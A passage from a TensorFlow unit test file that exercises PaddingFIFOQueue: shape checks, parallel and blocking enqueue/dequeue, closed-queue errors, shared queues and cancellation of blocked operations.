q.enqueue((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((array_ops.placeholder(dtypes_lib.int32),
array_ops.placeholder(dtypes_lib.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.cached_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.int32), (
(2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = array_ops.placeholder(dtypes_lib.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
self.evaluate(dequeued_t)
def testParallelEnqueueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
self.evaluate(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelDequeueUpTo(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(1000, dtypes_lib.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(101)
enqueue_op.run()
close_op.run()
# Dequeue up to 101 items in parallel on 10 threads, from closed queue.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(50, dtypes_lib.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
self.evaluate(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(self.evaluate(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = array_ops.placeholder(
dtypes_lib.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(
elements_enqueued, elements_enqueued + count, dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = array_ops.placeholder(dtypes_lib.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
self.evaluate(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, self.evaluate(dequeued_t))
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(
elements_dequeued, elements_dequeued + count, dtype=np.int32)
self.assertAllEqual(expected_range,
dequeuemany_t.eval({
count_placeholder: count
}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testBlockingDequeueUpTo(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.evaluate(enqueue_op)
def dequeue():
dequeued_elems.extend(self.evaluate(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.cached_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = data_flow_ops.PaddingFIFOQueue(100, dtypes_lib.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = data_flow_ops.PaddingFIFOQueue(total_count, dtypes_lib.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
def testBlockingDequeueFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testDequeueUpToFromClosedQueueReturnsRemainder(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_up_to(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
self.assertAllEqual(elems[3:], self.evaluate(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyButNotAllFromClosedQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems[:3], self.evaluate(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
self.evaluate(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], self.evaluate(dequeued_t))
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate(dequeued_t)
self.assertEqual(elems[3], self.evaluate(cleanup_dequeue_t))
def close():
self.evaluate(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, (dtypes_lib.float32,
dtypes_lib.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(errors_impl.OutOfRangeError):
self.evaluate([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = self.evaluate([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
self.assertEqual([50.0], self.evaluate(dequeued_t))
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], self.evaluate(dequeued_t))
time.sleep(0.01)
self.assertEqual([50.0], self.evaluate(dequeued_t))
self.assertEqual([60.0], self.evaluate(dequeued_t))
# Make sure the thread finishes before exiting.
thread.join()
def testBlockingEnqueueBeforeClose(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(4, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
self.evaluate(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, self.evaluate(dequeued_t))
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, self.evaluate(dequeued_t))
def testDoesNotLoseValue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(1, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = data_flow_ops.PaddingFIFOQueue(
1, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_2 = data_flow_ops.PaddingFIFOQueue(
15, dtypes_lib.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_b")
q_b_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_c")
q_c_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((),), shared_name="q_f")
q_f_2 = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), ((), ()),
shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
q2 = data_flow_ops.PaddingFIFOQueue(15, dtypes_lib.float32, ((),))
enq_q = data_flow_ops.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
@test_util.run_deprecated_v1
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(5, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(2, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.cached_session() as sess:
dtypes = [
dtypes_lib.float32, dtypes_lib.float64, dtypes_lib.int32,
